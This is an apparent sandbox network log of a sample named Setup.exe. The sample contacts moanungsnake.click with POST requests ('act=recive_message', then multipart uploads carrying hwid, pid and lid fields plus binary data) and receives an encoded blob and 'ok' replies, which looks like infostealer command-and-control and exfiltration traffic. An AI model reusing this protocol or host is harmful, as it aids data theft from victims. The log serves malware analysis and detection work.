2024-12-23 23:43:15 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ruum73td7cijiitr896neakjbg; expires=Fri, 18 Apr 2025 17:29:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mABvOxH6Tnw5vuFohs4dboNwfLfCn0zHIIFB8yK8PJvbWDoYPFyfzLnY3%2Fv%2BlJGvHgYdkrTFHcy3MzU1cG9%2F1GPwrGfokS1vF3Goasa%2BAAKQ6vNKW7H55QDA2ElA3Wv6AR8CMss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36797f474289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1813664&cwnd=150&unsent_bytes=0&cid=b3b8bdc920c7ceb7&ts=754&x=0"
2024-12-23 23:43:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-23 23:43:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:17 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: moanungsnake.click
2024-12-23 23:43:17 UTC	77	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
2024-12-23 23:43:17 UTC	1135	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jaqtcgdnpunq0i8n478qekf93a; expires=Fri, 18 Apr 2025 17:29:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVt70%2FAou79gKWX1aF4qTuoc%2B%2Bp3ZiFLGPbFk3bsYezqc9oOmLYP1UbFXJLtlxqiRX3njavM%2BciBJH%2FW0AunG1FIZ8825XrCtDph%2B6C26P6SAgjsn0eNGDEe4VMX7RBX%2BioIRCw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c3685d889434a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2141&min_rtt=2129&rtt_var=823&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=979&delivery_rate=1311180&cwnd=228&unsent_bytes=0&cid=8e41080dcfe91543&ts=777&x=0"
2024-12-23 23:43:17 UTC	234	IN	Data Raw: 33 61 38 38 0d 0a 75 45 2b 30 42 70 32 2b 50 47 72 2b 61 79 54 64 6e 6b 52 6b 4f 6f 66 68 38 32 69 33 46 33 4c 68 69 72 6d 52 54 36 55 75 35 79 72 44 62 63 49 6b 70 34 6f 51 53 49 30 4f 42 75 66 34 4a 51 68 4a 34 73 33 52 43 64 4d 31 53 49 66 72 31 65 49 71 69 51 79 52 52 35 70 31 30 6d 66 78 7a 56 6c 47 33 41 35 63 2f 36 51 66 48 78 6a 69 6a 39 46 53 6c 58 49 59 67 2b 76 56 38 79 37 4f 51 5a 64 47 32 79 66 59 59 66 58 62 58 77 36 66 42 30 6d 34 2b 79 45 46 55 4f 6d 49 6e 67 44 61 4e 56 37 44 37 38 4f 7a 64 59 64 6a 67 6c 37 5a 41 74 56 31 39 70 78 42 52 6f 56 4a 51 62 4f 38 66 6b 5a 62 34 6f 4f 66 44 74 4e 38 47 6f 6e 69 33 66 49 72 7a 31 36 4f 54 4e 41 6e 31 6d 4c 30 30 56 59 61 6b 67 31 4f Data Ascii: 3a88uE+0Bp2+PGr+ayTdnkRkOofh82i3F3LhirmRT6Uu5yrDbcIkp4oQSI0OBuf4JQhJ4s3RCdM1SIfr1eIqiQyRR5p10mfxzVlG3A5c/6QfHxjij9FSlXIYg+vV8y7OQZdG2yfYYfXbXw6fB0m4+yEFUOmIngDaNV7D78OzdYdjgl7ZAtV19pxBRoVJQbO8fkZb4oOfDtN8Goni3fIrz16OTNAn1mL00VYakg1O
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 73 2f 30 72 42 52 69 72 77 35 59 53 6c 53 31 51 30 4e 72 59 34 6a 7a 53 51 5a 56 4f 6d 6a 4b 59 66 62 2f 62 55 6b 6a 45 53 55 36 7a 38 69 4d 46 56 2b 4b 43 6b 52 6a 61 64 52 4f 4c 34 4e 2f 35 49 73 68 44 69 30 4c 64 4a 64 39 6a 38 4e 74 57 44 70 4d 4b 42 76 47 38 49 52 34 59 76 63 4f 78 47 74 5a 32 42 49 37 35 6d 2b 78 6a 33 67 79 43 52 4a 70 31 6c 6d 4c 78 33 56 4d 49 6a 67 46 4e 74 50 6b 30 44 56 48 6f 6a 70 45 48 33 33 6f 54 67 2b 2f 52 2b 53 4c 4e 53 49 68 46 33 43 33 57 4a 4c 47 63 57 52 44 63 55 51 61 63 2b 54 59 42 56 50 50 42 71 30 72 4b 4f 77 6e 44 37 39 65 7a 64 59 64 45 67 45 76 5a 4a 74 6c 6e 39 39 64 4d 43 49 34 50 53 37 72 75 49 41 4e 57 37 34 43 44 41 4e 74 7a 45 34 72 6a 30 76 59 71 77 77 7a 4c 43 4e 30 31 6c 6a 79 2f 2f 56 4d 44 6b 41 4e Data Ascii: s/0rBRirw5YSlS1Q0NrY4jzSQZVOmjKYfb/bUkjESU6z8iMFV+KCkRjadROL4N/5IshDi0LdJd9j8NtWDpMKBvG8IR4YvcOxGtZ2BI75m+xj3gyCRJp1lmLx3VMIjgFNtPk0DVHojpEH33oTg+/R+SLNSIhF3C3WJLGcWRDcUQac+TYBVPPBq0rKOwnD79ezdYdEgEvZJtln99dMCI4PS7ruIANW74CDANtzE4rj0vYqwwzLCN01ljy//VMDkAN
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 42 52 4b 35 59 2b 44 42 74 39 7a 48 34 37 6b 6d 37 31 74 77 46 54 46 45 4a 6f 48 31 58 44 38 31 68 77 39 6e 77 64 49 75 4f 70 6d 47 52 62 38 77 35 59 47 6c 53 31 51 6a 75 6e 54 39 54 2f 49 51 59 5a 47 31 43 4c 54 61 2f 66 63 58 67 57 5a 44 55 32 30 2f 79 73 43 53 75 2b 44 6d 51 2f 55 66 78 72 44 70 70 76 30 4e 59 63 55 78 58 6e 4e 4a 70 52 52 2f 4e 4a 51 44 34 70 4a 57 66 48 6c 5a 67 46 55 70 64 76 52 42 39 31 77 46 59 7a 70 30 66 30 6f 7a 55 43 4e 52 74 6b 2f 32 57 44 2f 30 46 59 43 6b 51 64 43 74 2f 55 74 44 56 37 6c 67 70 74 4b 6d 7a 55 58 6d 36 69 44 73 78 6e 41 51 49 68 48 6d 42 6a 56 61 76 48 62 53 45 69 44 52 31 2f 2f 2b 79 70 47 41 4b 57 50 6d 41 72 65 66 78 53 44 37 39 62 32 4c 73 42 50 69 45 2f 51 49 39 46 67 38 39 56 54 44 70 77 4f 51 72 72 75 Data Ascii: BRK5Y+DBt9zH47km71twFTFEJoH1XD81hw9nwdIuOpmGRb8w5YGlS1QjunT9T/IQYZG1CLTa/fcXgWZDU20/ysCSu+DmQ/UfxrDppv0NYcUxXnNJpRR/NJQD4pJWfHlZgFUpdvRB91wFYzp0f0ozUCNRtk/2WD/0FYCkQdCt/UtDV7lgptKmzUXm6iDsxnAQIhHmBjVavHbSEiDR1//+ypGAKWPmArefxSD79b2LsBPiE/QI9Fg89VTDpwOQrru
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 57 49 70 41 54 44 4e 51 2f 4e 38 5a 76 30 49 59 63 55 78 55 48 54 50 39 68 71 39 74 46 59 41 4a 73 48 53 37 54 36 4c 51 46 66 34 34 36 5a 42 39 42 32 45 59 66 69 79 66 41 6d 7a 55 47 50 43 4a 52 74 30 58 79 2f 68 42 34 76 6b 43 42 57 70 4f 34 77 52 6b 65 72 6d 74 45 4e 32 54 56 49 77 2b 76 55 2b 69 4c 50 52 49 70 48 33 69 50 51 59 76 4c 5a 55 51 4b 4f 41 55 69 79 39 79 6b 4e 53 75 57 4f 6c 51 62 52 66 52 75 4a 71 4a 57 7a 4b 74 38 4d 33 51 6a 76 49 4e 6c 6b 2f 4d 6f 65 46 39 49 51 42 72 6a 77 5a 6c 34 59 36 59 32 52 42 64 6c 35 47 34 76 70 31 2f 30 71 77 6b 57 4e 51 4d 67 73 30 6d 7a 2b 30 6c 45 4a 6d 41 78 44 75 2f 73 69 41 46 65 6c 7a 64 45 4e 7a 54 56 49 77 38 66 38 78 6d 2f 6d 64 73 56 58 6c 44 53 57 59 2f 4f 63 42 6b 69 51 43 6b 71 33 38 79 41 50 56 Data Ascii: WIpATDNQ/N8Zv0IYcUxUHTP9hq9tFYAJsHS7T6LQFf446ZB9B2EYfiyfAmzUGPCJRt0Xy/hB4vkCBWpO4wRkermtEN2TVIw+vU+iLPRIpH3iPQYvLZUQKOAUiy9ykNSuWOlQbRfRuJqJWzKt8M3QjvINlk/MoeF9IQBrjwZl4Y6Y2RBdl5G4vp1/0qwkWNQMgs0mz+0lEJmAxDu/siAFelzdENzTVIw8f8xm/mdsVXlDSWY/OcBkiQCkq38yAPV
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 4b 33 33 34 55 67 4f 7a 65 2f 43 7a 47 53 70 64 50 30 7a 2f 59 61 66 44 55 56 67 47 64 44 55 4f 79 2b 69 6f 4d 57 65 4b 4e 6e 77 4b 56 4f 31 43 45 38 4a 75 72 62 65 5a 63 6e 6c 72 4d 49 50 64 70 38 4a 78 42 52 6f 56 4a 51 62 4f 38 66 6b 5a 52 39 34 65 63 47 4e 78 79 48 6f 7a 72 79 66 49 67 7a 46 36 43 52 39 34 71 32 6d 4c 77 32 6c 38 4e 6c 67 56 42 75 76 63 70 43 68 69 72 77 35 59 53 6c 53 31 51 72 65 50 49 35 43 37 4a 52 35 4e 54 6d 6a 4b 59 66 62 2f 62 55 6b 6a 45 53 55 57 30 39 79 49 47 56 4f 57 48 6e 41 72 48 65 68 65 45 34 64 44 68 4a 38 42 4c 6a 6b 44 52 49 74 42 32 38 39 4a 4d 44 59 34 62 42 76 47 38 49 52 34 59 76 63 4f 6e 44 63 56 6c 45 38 48 5a 7a 66 41 37 7a 45 47 4a 43 4d 56 6a 7a 79 54 34 30 42 35 51 33 41 39 4a 74 76 38 70 42 31 48 70 6a 70 Data Ascii: K334UgOze/CzGSpdP0z/YafDUVgGdDUOy+ioMWeKNnwKVO1CE8JurbeZcnlrMIPdp8JxBRoVJQbO8fkZR94ecGNxyHozryfIgzF6CR94q2mLw2l8NlgVBuvcpChirw5YSlS1QrePI5C7JR5NTmjKYfb/bUkjESUW09yIGVOWHnArHeheE4dDhJ8BLjkDRItB289JMDY4bBvG8IR4YvcOnDcVlE8HZzfA7zEGJCMVjzyT40B5Q3A9Jtv8pB1Hpjp
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 55 4c 76 6a 31 63 45 75 33 41 79 61 42 73 4e 74 30 57 69 2f 68 42 34 4c 6d 77 70 48 74 66 55 71 43 56 2f 68 6b 5a 73 4e 78 33 51 52 69 4f 58 58 38 79 44 4b 52 6f 52 42 31 79 48 62 59 2f 6a 54 57 30 6a 53 53 55 47 6e 76 48 35 47 65 65 69 49 6e 56 47 50 4e 51 2f 4e 38 5a 76 30 49 59 63 55 78 55 6a 51 4b 4e 78 70 2f 4e 4e 64 47 70 30 50 56 4c 2f 78 4c 42 52 53 37 6f 61 63 42 39 68 32 46 6f 58 6a 31 2b 45 6b 78 30 2b 4f 43 4a 52 74 30 58 79 2f 68 42 34 72 69 78 39 4d 75 50 41 77 44 56 6e 6d 6c 5a 77 61 6c 54 74 51 6b 75 2f 4b 73 33 58 52 58 4a 4a 50 78 57 50 50 4a 50 6a 51 48 6c 44 63 44 30 2b 35 2b 79 41 49 53 75 43 46 6e 67 58 63 66 42 53 4c 36 39 76 33 4b 63 42 4a 68 6b 54 52 4b 74 56 72 2b 39 56 51 41 5a 4e 4a 43 50 2f 37 50 6b 59 41 70 61 4b 4b 43 64 6c Data Ascii: ULvj1cEu3AyaBsNt0Wi/hB4LmwpHtfUqCV/hkZsNx3QRiOXX8yDKRoRB1yHbY/jTW0jSSUGnvH5GeeiInVGPNQ/N8Zv0IYcUxUjQKNxp/NNdGp0PVL/xLBRS7oacB9h2FoXj1+Ekx0+OCJRt0Xy/hB4rix9MuPAwDVnmlZwalTtQku/Ks3XRXJJPxWPPJPjQHlDcD0+5+yAISuCFngXcfBSL69v3KcBJhkTRKtVr+9VQAZNJCP/7PkYApaKKCdl
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 74 6a 36 62 59 6b 4d 67 6c 43 61 64 5a 5a 45 39 4d 70 62 44 34 70 4c 63 37 7a 79 4b 41 46 4f 70 5a 79 75 52 4a 56 30 55 4e 76 52 77 72 4d 37 68 78 54 58 42 70 6f 2f 6c 6a 79 2f 6d 31 30 61 6a 67 39 46 71 66 39 68 4f 47 62 43 6c 5a 73 4e 78 58 49 48 6a 4b 69 56 73 79 4b 48 46 4c 77 49 30 79 72 4e 64 65 6e 52 54 67 2f 63 4e 67 6a 2f 35 47 5a 65 47 4e 43 41 6e 77 54 53 59 77 48 4f 7a 38 33 35 4b 74 64 4c 6b 6b 65 61 59 35 5a 69 76 34 51 4e 52 74 77 4e 56 2f 2b 6b 64 6c 51 44 73 4e 44 47 57 6f 64 71 58 70 71 6f 7a 62 4e 31 6c 51 4c 46 57 70 70 31 6c 69 50 38 7a 6b 77 4f 6e 78 39 46 2b 4d 49 59 49 55 4c 6f 68 59 59 62 36 30 73 58 6d 65 58 64 35 44 79 4c 57 59 5a 47 31 43 72 41 4a 4c 47 63 55 55 6a 45 4d 41 62 33 76 42 6c 49 47 50 33 44 79 55 72 67 64 68 36 4e Data Ascii: tj6bYkMglCadZZE9MpbD4pLc7zyKAFOpZyuRJV0UNvRwrM7hxTXBpo/ljy/m10ajg9Fqf9hOGbClZsNxXIHjKiVsyKHFLwI0yrNdenRTg/cNgj/5GZeGNCAnwTSYwHOz835KtdLkkeaY5Ziv4QNRtwNV/+kdlQDsNDGWodqXpqozbN1lQLFWpp1liP8zkwOnx9F+MIYIULohYYb60sXmeXd5DyLWYZG1CrAJLGcUUjEMAb3vBlIGP3DyUrgdh6N
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 33 52 44 4e 30 61 6c 47 33 45 4a 4b 65 63 47 51 75 4f 47 30 43 38 36 69 56 42 5a 74 75 6b 6e 77 33 55 59 77 43 55 35 2b 58 4e 4f 4d 52 43 69 30 2f 4d 50 4a 59 71 76 39 4d 65 55 4b 56 4a 44 76 2f 44 61 45 5a 41 70 64 76 52 50 39 5a 37 48 6f 54 2b 79 72 34 4b 79 55 75 45 58 73 6f 36 32 53 53 78 6e 46 68 49 78 46 73 49 2f 2f 67 33 52 67 43 31 30 63 70 66 68 69 4a 41 30 66 65 56 36 6d 33 52 44 4e 30 61 6c 47 33 45 4a 4b 65 63 47 51 75 4f 47 30 43 38 36 69 56 42 5a 74 75 6b 6e 77 33 55 59 77 43 55 35 35 54 64 47 2b 5a 79 75 31 33 5a 49 39 68 6a 36 63 30 65 52 74 77 47 42 75 66 46 5a 6b 34 59 32 73 33 52 45 70 55 74 55 4c 62 72 31 66 30 71 30 56 33 49 62 39 51 71 31 33 4c 76 79 31 46 48 73 6a 39 6e 2f 37 4a 6d 41 42 69 39 30 64 39 4b 30 57 52 51 32 37 69 4a 71 Data Ascii: 3RDN0alG3EJKecGQuOG0C86iVBZtuknw3UYwCU5+XNOMRCi0/MPJYqv9MeUKVJDv/DaEZApdvRP9Z7HoT+yr4KyUuEXso62SSxnFhIxFsI//g3RgC10cpfhiJA0feV6m3RDN0alG3EJKecGQuOG0C86iVBZtuknw3UYwCU55TdG+Zyu13ZI9hj6c0eRtwGBufFZk4Y2s3REpUtULbr1f0q0V3Ib9Qq13Lvy1FHsj9n/7JmABi90d9K0WRQ27iJq
2024-12-23 23:43:17 UTC	1369	IN	Data Raw: 46 52 74 31 74 6d 43 54 6e 6e 41 5a 49 73 52 74 42 72 2f 39 6d 53 42 6a 70 77 38 6c 4b 32 47 63 58 6b 2b 75 58 39 44 66 41 44 4a 6f 47 77 32 33 41 4a 4b 65 50 45 45 69 4f 53 52 37 2f 75 79 67 4c 57 65 61 4e 6b 68 6a 48 63 78 4f 56 36 35 7a 4e 45 2b 70 65 67 6c 6a 5a 62 2b 64 70 2b 38 70 4c 43 34 77 4f 65 49 48 52 4e 41 46 49 35 73 47 39 44 64 68 35 4c 72 33 66 79 76 51 39 68 57 71 47 58 74 6c 74 6d 43 54 6e 6e 41 5a 49 73 52 74 42 72 2f 39 6b 4b 6c 2f 6f 6a 39 45 56 6d 32 78 51 6c 61 69 44 6f 47 4f 48 58 73 55 51 6d 6d 72 56 64 75 33 61 58 52 36 66 54 6e 69 42 30 54 51 42 53 4f 62 42 6f 41 66 52 59 77 57 41 2b 4e 7a 4e 45 2b 70 65 67 6c 6a 5a 62 2f 4e 65 76 65 31 49 43 35 77 48 51 66 2b 79 5a 68 34 59 76 63 4f 38 47 4e 4a 6c 45 38 48 4e 34 62 45 63 30 55 Data Ascii: FRt1tmCTnnAZIsRtBr/9mSBjpw8lK2GcXk+uX9DfADJoGw23AJKePEEiOSR7/uygLWeaNkhjHcxOV65zNE+pegljZb+dp+8pLC4wOeIHRNAFI5sG9Ddh5Lr3fyvQ9hWqGXtltmCTnnAZIsRtBr/9kKl/oj9EVm2xQlaiDoGOHXsUQmmrVdu3aXR6fTniB0TQBSObBoAfRYwWA+NzNE+pegljZb/Neve1IC5wHQf+yZh4YvcO8GNJlE8HN4bEc0U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:19 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D34RTGIM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18101 Host: moanungsnake.click
2024-12-23 23:43:19 UTC	15331	OUT	Data Raw: 2d 2d 44 33 34 52 54 47 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 44 33 34 52 54 47 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 33 34 52 54 47 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 44 33 34 52 54 47 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f Data Ascii: --D34RTGIMContent-Disposition: form-data; name="hwid"F6D9E6D27CD3277B9546E64A28D3FD49--D34RTGIMContent-Disposition: form-data; name="pid"2--D34RTGIMContent-Disposition: form-data; name="lid"hRjzG3--DNO--D34RTGIMContent-Dispositio
2024-12-23 23:43:19 UTC	2770	OUT	Data Raw: 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d f6 Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
2024-12-23 23:43:20 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=enij3gs1hn86hpiojun72p16pr; expires=Fri, 18 Apr 2025 17:29:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IwlIYlReoDybeYW0oWS5hP8w9y7udTs3eCc03IM9qMNSWvSmqLWfLbct5COyqxyEeGRbUD8xc8e8%2FA%2BWSuQgBfEobdJi%2ByAfY0K7NYSzwi8g3i9zkwFw4EMYCdvRscRWrPs%2FcQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36938a716a5e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1597&rtt_var=645&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19055&delivery_rate=1638608&cwnd=186&unsent_bytes=0&cid=840808c5900095dd&ts=950&x=0"
2024-12-23 23:43:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 23:43:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:21 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=28EV8RW5W6V2FNHL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8770 Host: moanungsnake.click
2024-12-23 23:43:21 UTC	8770	OUT	Data Raw: 2d 2d 32 38 45 56 38 52 57 35 57 36 56 32 46 4e 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 32 38 45 56 38 52 57 35 57 36 56 32 46 4e 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 38 45 56 38 52 57 35 57 36 56 32 46 4e 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 32 38 45 56 Data Ascii: --28EV8RW5W6V2FNHLContent-Disposition: form-data; name="hwid"F6D9E6D27CD3277B9546E64A28D3FD49--28EV8RW5W6V2FNHLContent-Disposition: form-data; name="pid"2--28EV8RW5W6V2FNHLContent-Disposition: form-data; name="lid"hRjzG3--DNO--28EV
2024-12-23 23:43:22 UTC	1125	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a1d49jg8pnvjp9upl6s9sh35fs; expires=Fri, 18 Apr 2025 17:30:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TAlef6Zkqi7n8AN%2FD831E2SEsvaFjU7Bnt6Gf4RCkZ2woTQBA8XLbfhQpQ4sB3LWySiVbeu2XZM67a5tPeozD1XxVYhNsNZSnOc8R5t9vMionxV5wlpk7itDmvSMEmo9RI3xCOk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36a21e037288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1912&rtt_var=719&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9709&delivery_rate=1520041&cwnd=245&unsent_bytes=0&cid=0554e2954cefa2bb&ts=850&x=0"
2024-12-23 23:43:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 23:43:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:24 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BSHXW675YV8U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20399 Host: moanungsnake.click
